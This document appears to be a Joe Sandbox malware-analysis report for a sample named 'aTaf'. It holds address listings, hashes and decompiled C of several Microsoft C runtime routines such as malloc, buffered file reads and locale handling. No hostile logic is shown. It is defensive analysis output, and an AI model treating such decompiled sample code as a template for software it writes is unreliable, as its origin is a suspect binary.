                              0x00405834
                              0x00405837
                              0x00405837
                              0x00405839
                              0x0040583a
                              0x00405842
                              0x00405847
                              0x0040584a
                              0x0040584f
                              0x0040591c
                              0x0040591c
                              0x00000000
                              0x00405855
                              0x00405855
                              0x00405859
                              0x0040585b
                              0x00000000
                              0x00405870
                              0x00405872
                              0x00405874
                              0x00405874
                              0x00405877
                              0x0040587b
                              0x00405881
                              0x00405881
                              0x00405885
                              0x00405889
                              0x00405897
                              0x00405899
                              0x004058a5
                              0x004058a7
                              0x004058b3
                              0x004058b5
                              0x004058c1
                              0x004058c5
                              0x004058c7
                              0x004058c7
                              0x004058c8
                              0x004058b7
                              0x004058b7
                              0x004058b7
                              0x004058a9
                              0x004058a9
                              0x004058a9
                              0x0040589b
                              0x0040589b
                              0x0040589b
                              0x0040588f
                              0x00405892
                              0x00405892
                              0x004058cc
                              0x004058cf
                              0x00000000
                              0x00000000
                              0x004058d1
                              0x004058d9
                              0x00000000
                              0x00000000
                              0x004058db
                              0x004058db
                              0x004058e0
                              0x00000000
                              0x004058e2
                              0x004058e4
                              0x00405930
                              0x0040593f
                              0x00405942
                              0x00405944
                              0x00405949
                              0x0040594c
                              0x0040594e
                              0x00000000
                              0x00405950
                              0x00405950
                              0x00405953
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405953
                              0x004058e6
                              0x004058ea
                              0x004058ec
                              0x004058f1
                              0x004058f2
                              0x004058f4
                              0x004058f6
                              0x004058f8
                              0x004058f9
                              0x00405904
                              0x00405906
                              0x0040590b
                              0x0040590e
                              0x00405911
                              0x00405916
                              0x00000000
                              0x00405955
                              0x00405955
                              0x00405955
                              0x00405961
                              0x00405963
                              0x00405967
                              0x0040596d
                              0x0040596e
                              0x0040597c
                              0x0040597d
                              0x00405970
                              0x00405970
                              0x00405974
                              0x00405975
                              0x00405975
                              0x00405985
                              0x00405988
                              0x0040598a
                              0x00000000
                              0x0040598c
                              0x0040598c
                              0x00405990
                              0x004059a5
                              0x004059ad
                              0x004059b6
                              0x004059b6
                              0x004059b9
                              0x004059c5
                              0x00405992
                              0x00405992
                              0x004059a2
                              0x004059a2
                              0x00405990
                              0x0040598a
                              0x00405916
                              0x004058e4
                              0x00000000
                              0x00405860
                              0x00405860
                              0x00405862
                              0x00405864
                              0x00405865
                              0x00405868
                              0x00000000
                              0x0040586a
                              0x0040586a
                              0x0040586d
                              0x00000000
                              0x00405868
                              0x0040584f
                              0x004057ea
                              0x00000000

                              APIs
                              • _malloc.LIBCMT ref: 004057DE
                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                              • _malloc.LIBCMT ref: 00405842
                              • _malloc.LIBCMT ref: 00405906
                              • _malloc.LIBCMT ref: 00405930
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _malloc$AllocateHeap
                              • String ID: 1.2.3
                              • API String ID: 680241177-2310465506
                              • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                              • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _malloc.LIBCMT ref: 00505A45
                                • Part of subcall function 0050BAB4: __FF_MSGBANNER.LIBCMT ref: 0050BAD7
                                • Part of subcall function 0050BAB4: __NMSG_WRITE.LIBCMT ref: 0050BADE
                              • _malloc.LIBCMT ref: 00505AA9
                              • _malloc.LIBCMT ref: 00505B6D
                              • _malloc.LIBCMT ref: 00505B97
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _malloc
                              • String ID: 1.2.3
                              • API String ID: 1579825452-2310465506
                              • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                              • Instruction ID: f00b6c14ef8bef3fc8487807d71e6ff2f716c98e7dc79c0379f03df27d440cfc
                              • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                              • Instruction Fuzzy Hash: D661C1B1944B818FD7309F29888066FBFE0FB95710F544E2EE1D683681E775A84ACF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                              				signed int _v8;
                              				char* _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t90;
                              				intOrPtr* _t92;
                              				signed int _t94;
                              				char _t97;
                              				signed int _t105;
                              				void* _t106;
                              				signed int _t107;
                              				signed int _t110;
                              				signed int _t113;
                              				intOrPtr* _t114;
                              				signed int _t118;
                              				signed int _t119;
                              				signed int _t120;
                              				char* _t121;
                              				signed int _t125;
                              				signed int _t131;
                              				signed int _t133;
                              				void* _t134;
                              
                              				_t125 = __edx;
                              				_t121 = _a4;
                              				_t119 = _a8;
                              				_t131 = 0;
                              				_v12 = _t121;
                              				_v8 = _t119;
                              				if(_a12 == 0 || _a16 == 0) {
                              					L5:
                              					return 0;
                              				} else {
                              					_t138 = _t121;
                              					if(_t121 != 0) {
                              						_t133 = _a20;
                              						__eflags = _t133;
                              						if(_t133 == 0) {
                              							L9:
                              							__eflags = _t119 - 0xffffffff;
                              							if(_t119 != 0xffffffff) {
                              								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                              								_t134 = _t134 + 0xc;
                              							}
                              							__eflags = _t133 - _t131;
                              							if(__eflags == 0) {
                              								goto L3;
                              							} else {
                              								_t94 = _t90 | 0xffffffff;
                              								_t125 = _t94 % _a12;
                              								__eflags = _a16 - _t94 / _a12;
                              								if(__eflags > 0) {
                              									goto L3;
                              								}
                              								L13:
                              								_t131 = _a12 * _a16;
                              								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                              								_v20 = _t131;
                              								_t120 = _t131;
                              								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                              									_v16 = 0x1000;
                              								} else {
                              									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                              								}
                              								__eflags = _t131;
                              								if(_t131 == 0) {
                              									L40:
                              									return _a16;
                              								} else {
                              									do {
                              										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                              										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                              											L24:
                              											__eflags = _t120 - _v16;
                              											if(_t120 < _v16) {
                              												_t97 = E0040FC07(_t120, _t125, _t133);
                              												__eflags = _t97 - 0xffffffff;
                              												if(_t97 == 0xffffffff) {
                              													L48:
                              													return (_t131 - _t120) / _a12;
                              												}
                              												__eflags = _v8;
                              												if(_v8 == 0) {
                              													L44:
                              													__eflags = _a8 - 0xffffffff;
                              													if(__eflags != 0) {
                              														E0040BA30(_t131, _a4, 0, _a8);
                              														_t134 = _t134 + 0xc;
                              													}
                              													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													L4:
                              													E0040E744(_t125, _t131, _t133);
                              													goto L5;
                              												}
                              												_t123 = _v12;
                              												_v12 = _v12 + 1;
                              												 *_v12 = _t97;
                              												_t120 = _t120 - 1;
                              												_t70 =  &_v8;
                              												 *_t70 = _v8 - 1;
                              												__eflags =  *_t70;
                              												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                              												goto L39;
                              											}
                              											__eflags = _v16;
                              											if(_v16 == 0) {
                              												_t105 = 0x7fffffff;
                              												__eflags = _t120 - 0x7fffffff;
                              												if(_t120 <= 0x7fffffff) {
                              													_t105 = _t120;
                              												}
                              											} else {
                              												__eflags = _t120 - 0x7fffffff;
                              												if(_t120 <= 0x7fffffff) {
                              													_t55 = _t120 % _v16;
                              													__eflags = _t55;
                              													_t125 = _t55;
                              													_t110 = _t120;
                              												} else {
                              													_t125 = 0x7fffffff % _v16;
                              													_t110 = 0x7fffffff;
                              												}
                              												_t105 = _t110 - _t125;
                              											}
                              											__eflags = _t105 - _v8;
                              											if(_t105 > _v8) {
                              												goto L44;
                              											} else {
                              												_push(_t105);
                              												_push(_v12);
                              												_t106 = E0040FA20(_t125, _t131, _t133);
                              												_pop(_t123);
                              												_push(_t106);
                              												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                              												_t134 = _t134 + 0xc;
                              												__eflags = _t107;
                              												if(_t107 == 0) {
                              													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                              													goto L48;
                              												}
                              												__eflags = _t107 - 0xffffffff;
                              												if(_t107 == 0xffffffff) {
                              													L47:
                              													_t80 = _t133 + 0xc;
                              													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                              													__eflags =  *_t80;
                              													goto L48;
                              												}
                              												_v12 = _v12 + _t107;
                              												_t120 = _t120 - _t107;
                              												_v8 = _v8 - _t107;
                              												goto L39;
                              											}
                              										}
                              										_t113 =  *(_t133 + 4);
                              										__eflags = _t113;
                              										if(__eflags == 0) {
                              											goto L24;
                              										}
                              										if(__eflags < 0) {
                              											goto L47;
                              										}
                              										_t131 = _t120;
                              										__eflags = _t120 - _t113;
                              										if(_t120 >= _t113) {
                              											_t131 = _t113;
                              										}
                              										__eflags = _t131 - _v8;
                              										if(_t131 > _v8) {
                              											_t133 = 0;
                              											__eflags = _a8 - 0xffffffff;
                              											if(__eflags != 0) {
                              												E0040BA30(_t131, _a4, 0, _a8);
                              												_t134 = _t134 + 0xc;
                              											}
                              											_t114 = E0040BFC1(__eflags);
                              											_push(_t133);
                              											_push(_t133);
                              											_push(_t133);
                              											_push(_t133);
                              											 *_t114 = 0x22;
                              											_push(_t133);
                              											goto L4;
                              										} else {
                              											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                              											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                              											 *_t133 =  *_t133 + _t131;
                              											_v12 = _v12 + _t131;
                              											_t120 = _t120 - _t131;
                              											_t134 = _t134 + 0x10;
                              											_v8 = _v8 - _t131;
                              											_t131 = _v20;
                              										}
                              										L39:
                              										__eflags = _t120;
                              									} while (_t120 != 0);
                              									goto L40;
                              								}
                              							}
                              						}
                              						_t118 = _t90 | 0xffffffff;
                              						_t90 = _t118 / _a12;
                              						_t125 = _t118 % _a12;
                              						__eflags = _a16 - _t90;
                              						if(_a16 <= _t90) {
                              							goto L13;
                              						}
                              						goto L9;
                              					}
                              					L3:
                              					_t92 = E0040BFC1(_t138);
                              					_push(_t131);
                              					_push(_t131);
                              					_push(_t131);
                              					_push(_t131);
                              					 *_t92 = 0x16;
                              					_push(_t131);
                              					goto L4;
                              				}
                              			}





























                              0x0040bcc2
                              0x0040bcca
                              0x0040bcce
                              0x0040bcd3
                              0x0040bcd5
                              0x0040bcd8
                              0x0040bcde
                              0x0040bd01
                              0x00000000
                              0x0040bce5
                              0x0040bce5
                              0x0040bce7
                              0x0040bd08
                              0x0040bd0b
                              0x0040bd0d
                              0x0040bd1c
                              0x0040bd1c
                              0x0040bd1f
                              0x0040bd24
                              0x0040bd29
                              0x0040bd29
                              0x0040bd2c
                              0x0040bd2e
                              0x00000000
                              0x0040bd30
                              0x0040bd30
                              0x0040bd35
                              0x0040bd38
                              0x0040bd3b
                              0x00000000
                              0x00000000
                              0x0040bd3d
                              0x0040bd40
                              0x0040bd44
                              0x0040bd4b
                              0x0040bd4e
                              0x0040bd50
                              0x0040bd5a
                              0x0040bd52
                              0x0040bd55
                              0x0040bd55
                              0x0040bd61
                              0x0040bd63
                              0x0040be53
                              0x00000000
                              0x0040bd69
                              0x0040bd69
                              0x0040bd69
                              0x0040bd70
                              0x0040bdb6
                              0x0040bdb6
                              0x0040bdb9
                              0x0040be24
                              0x0040be2a
                              0x0040be2d
                              0x0040beb8
                              0x00000000
                              0x0040bebe
                              0x0040be33
                              0x0040be37
                              0x0040be87
                              0x0040be87
                              0x0040be8b
                              0x0040be95
                              0x0040be9a
                              0x0040be9a
                              0x0040bea2
                              0x0040beaa
                              0x0040beab
                              0x0040beac
                              0x0040bead
                              0x0040beae
                              0x0040bcf9
                              0x0040bcf9
                              0x00000000
                              0x0040bcfe
                              0x0040be39
                              0x0040be3c
                              0x0040be3f
                              0x0040be44
                              0x0040be45
                              0x0040be45
                              0x0040be45
                              0x0040be48
                              0x00000000
                              0x0040be48
                              0x0040bdbb
                              0x0040bdbf
                              0x0040bde0
                              0x0040bde5
                              0x0040bde7
                              0x0040bde9
                              0x0040bde9
                              0x0040bdc1
                              0x0040bdc8
                              0x0040bdca
                              0x0040bdd7
                              0x0040bdd7
                              0x0040bdd7
                              0x0040bdda
                              0x0040bdcc
                              0x0040bdce
                              0x0040bdd1
                              0x0040bdd1
                              0x0040bddc
                              0x0040bddc
                              0x0040bdeb
                              0x0040bdee
                              0x00000000
                              0x0040bdf4
                              0x0040bdf4
                              0x0040bdf5
                              0x0040bdf9
                              0x0040bdfe
                              0x0040bdff
                              0x0040be00
                              0x0040be05
                              0x0040be08
                              0x0040be0a
                              0x0040bec6
                              0x00000000
                              0x0040bec6
                              0x0040be10
                              0x0040be13
                              0x0040beb4
                              0x0040beb4
                              0x0040beb4
                              0x0040beb4
                              0x00000000
                              0x0040beb4
                              0x0040be19
                              0x0040be1c
                              0x0040be1e
                              0x00000000
                              0x0040be1e
                              0x0040bdee
                              0x0040bd72
                              0x0040bd75
                              0x0040bd77
                              0x00000000
                              0x00000000
                              0x0040bd79
                              0x00000000
                              0x00000000
                              0x0040bd7f
                              0x0040bd81
                              0x0040bd83
                              0x0040bd85
                              0x0040bd85
                              0x0040bd87
                              0x0040bd8a
                              0x0040be5b
                              0x0040be5d
                              0x0040be61
                              0x0040be6a
                              0x0040be6f
                              0x0040be6f
                              0x0040be72
                              0x0040be77
                              0x0040be78
                              0x0040be79
                              0x0040be7a
                              0x0040be7b
                              0x0040be81
                              0x00000000
                              0x0040bd90
                              0x0040bd99
                              0x0040bd9e
                              0x0040bda1
                              0x0040bda3
                              0x0040bda6
                              0x0040bda8
                              0x0040bdab
                              0x0040bdae
                              0x0040bdae
                              0x0040be4b
                              0x0040be4b
                              0x0040be4b
                              0x00000000
                              0x0040bd69
                              0x0040bd63
                              0x0040bd2e
                              0x0040bd0f
                              0x0040bd14
                              0x0040bd14
                              0x0040bd17
                              0x0040bd1a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040bd1a
                              0x0040bce9
                              0x0040bce9
                              0x0040bcee
                              0x0040bcef
                              0x0040bcf0
                              0x0040bcf1
                              0x0040bcf2
                              0x0040bcf8
                              0x00000000
                              0x0040bcf8

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 3886058894-0
                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 3886058894-0
                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                              • Instruction ID: 156f7c7a55712f4a3eafccf25a6226955b65ad37cc6fca5e373cfcbf97ae1ec8
                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                              • Instruction Fuzzy Hash: 1F51C371A0020AEBEB209F698C8859EBFB5FF82360F248729F825971D1D7719E51DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __fileno$__getptd_noexit__lock_file
                              • String ID: 'B
                              • API String ID: 3755561058-2787509829
                              • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                              • Instruction ID: 82c9c252779995b0bd5845369259982ac03466f9a4e976445ee76e83448cda30
                              • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                              • Instruction Fuzzy Hash: D501663360461966C2216B786C4B42D7FA0BFC7B303368B14F0709B1D2EB28ED029295
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                              				signed int _t13;
                              				intOrPtr _t28;
                              				void* _t29;
                              				void* _t30;
                              
                              				_t30 = __eflags;
                              				_t26 = __edi;
                              				_t25 = __edx;
                              				_t22 = __ebx;
                              				_push(0xc);
                              				_push(0x4214d0);
                              				E0040E1D8(__ebx, __edi, __esi);
                              				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                              				_t13 =  *0x422e34; // 0xfffffffe
                              				if(( *(_t28 + 0x70) & _t13) == 0) {
                              					L6:
                              					E0040D6E0(_t22, 0xc);
                              					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                              					_t8 = _t28 + 0x6c; // 0x6c
                              					_t26 =  *0x422f18; // 0x422e40
                              					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                              					 *(_t29 - 4) = 0xfffffffe;
                              					E004147A2();
                              				} else {
                              					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                              					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                              						goto L6;
                              					} else {
                              						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                              					}
                              				}
                              				if(_t28 == 0) {
                              					E0040E79A(_t25, _t26, 0x20);
                              				}
                              				return E0040E21D(_t28);
                              			}







                              0x00414738
                              0x00414738
                              0x00414738
                              0x00414738
                              0x00414738
                              0x0041473a
                              0x0041473f
                              0x00414749
                              0x0041474b
                              0x00414753
                              0x00414777
                              0x00414779
                              0x0041477f
                              0x00414783
                              0x00414786
                              0x00414791
                              0x00414794
                              0x0041479b
                              0x00414755
                              0x00414755
                              0x00414759
                              0x00000000
                              0x0041475b
                              0x00414760
                              0x00414760
                              0x00414759
                              0x00414765
                              0x00414769
                              0x0041476e
                              0x00414776

                              APIs
                              • __getptd.LIBCMT ref: 00414744
                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                              • __getptd.LIBCMT ref: 0041475B
                              • __amsg_exit.LIBCMT ref: 00414769
                              • __lock.LIBCMT ref: 00414779
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                              • String ID: @.B
                              • API String ID: 3521780317-470711618
                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __getptd.LIBCMT ref: 005149AB
                                • Part of subcall function 0051099C: __getptd_noexit.LIBCMT ref: 0051099F
                                • Part of subcall function 0051099C: __amsg_exit.LIBCMT ref: 005109AC
                              • __getptd.LIBCMT ref: 005149C2
                              • __amsg_exit.LIBCMT ref: 005149D0
                              • __lock.LIBCMT ref: 005149E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                              • String ID: @.B
                              • API String ID: 3521780317-470711618
                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                              • Instruction ID: dcec378ed9d6efa4e25ba5d66deb9f56fb7a5a5a75655b24d5d5cf423d5fce63
                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                              • Instruction Fuzzy Hash: 4FF09031A407169BFB20FBB4890B7EE7BA07F80720F51191AE454A72D2CB74A881CF95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___addlocaleref.LIBCMT ref: 00514973
                              • ___removelocaleref.LIBCMT ref: 0051497E
                              • ___freetlocinfo.LIBCMT ref: 00514992
                                • Part of subcall function 005146F0: ___free_lconv_mon.LIBCMT ref: 00514736
                                • Part of subcall function 005146F0: ___free_lconv_num.LIBCMT ref: 00514757
                                • Part of subcall function 005146F0: ___free_lc_time.LIBCMT ref: 005147DC
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                              • String ID: @.B$@.B
                              • API String ID: 4212647719-183327057
                              • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                              • Instruction ID: 1222d49adb0acbd4d095fcd2807a0c6f45d8dd0c38fa2a57cbb590ff0e7d76e7
                              • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                              • Instruction Fuzzy Hash: 14E0DF32521A2295AA312A1CE8002EF9E943FC2312B1B312AF808EB045DB248CC08CA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                              				intOrPtr _v8;
                              				void* _t16;
                              				void* _t17;
                              				intOrPtr _t19;
                              				void* _t21;
                              				signed int _t22;
                              				intOrPtr* _t27;
                              				intOrPtr _t39;
                              				intOrPtr _t40;
                              				intOrPtr _t50;
                              
                              				_t37 = __edx;
                              				_push(8);
                              				_push(0x421140);
                              				E0040E1D8(__ebx, __edi, __esi);
                              				_t39 = _a4;
                              				_t50 = _t39;
                              				_t51 = _t50 != 0;
                              				if(_t50 != 0) {
                              					E0040FB29(_t39);
                              					_v8 = 0;
                              					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                              					_t16 = E0040FA20(__edx, _t39, _t39);
                              					__eflags = _t16 - 0xffffffff;
                              					if(_t16 == 0xffffffff) {
                              						L6:
                              						_t17 = 0x4227e0;
                              					} else {
                              						_t21 = E0040FA20(__edx, _t39, _t39);
                              						__eflags = _t21 - 0xfffffffe;
                              						if(_t21 == 0xfffffffe) {
                              							goto L6;
                              						} else {
                              							_t22 = E0040FA20(__edx, _t39, _t39);
                              							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                              						}
                              					}
                              					_t9 = _t17 + 4; // 0xa80
                              					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                              					_v8 = 0xfffffffe;
                              					E0040C735(_t39);
                              					_t19 = 0;
                              					__eflags = 0;
                              				} else {
                              					_t27 = E0040BFC1(_t51);
                              					_t40 = 0x16;
                              					 *_t27 = _t40;
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					E0040E744(__edx, _t40, 0);
                              					_t19 = _t40;
                              				}
                              				return E0040E21D(_t19);
                              			}













                              0x0040c73d
                              0x0040c690
                              0x0040c692
                              0x0040c697
                              0x0040c69e
                              0x0040c6a3
                              0x0040c6a8
                              0x0040c6aa
                              0x0040c6c8
                              0x0040c6ce
                              0x0040c6d1
                              0x0040c6d6
                              0x0040c6dc
                              0x0040c6df
                              0x0040c70f
                              0x0040c70f
                              0x0040c6e1
                              0x0040c6e2
                              0x0040c6e8
                              0x0040c6eb
                              0x00000000
                              0x0040c6ed
                              0x0040c6ee
                              0x0040c70b
                              0x0040c70b
                              0x0040c6eb
                              0x0040c714
                              0x0040c71b
                              0x0040c71e
                              0x0040c725
                              0x0040c72a
                              0x0040c72a
                              0x0040c6ac
                              0x0040c6ac
                              0x0040c6b3
                              0x0040c6b4
                              0x0040c6b6
                              0x0040c6b7
                              0x0040c6b8
                              0x0040c6b9
                              0x0040c6ba
                              0x0040c6bb
                              0x0040c6c3
                              0x0040c6c3
                              0x0040c731

                              APIs
                              • __lock_file.LIBCMT ref: 0040C6C8
                              • __fileno.LIBCMT ref: 0040C6D6
                              • __fileno.LIBCMT ref: 0040C6E2
                              • __fileno.LIBCMT ref: 0040C6EE
                              • __fileno.LIBCMT ref: 0040C6FE
                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2805327698-0
                              • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                              • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                              				signed int _t15;
                              				LONG* _t21;
                              				long _t23;
                              				void* _t31;
                              				LONG* _t33;
                              				void* _t34;
                              				void* _t35;
                              
                              				_t35 = __eflags;
                              				_t29 = __edx;
                              				_t25 = __ebx;
                              				_push(0xc);
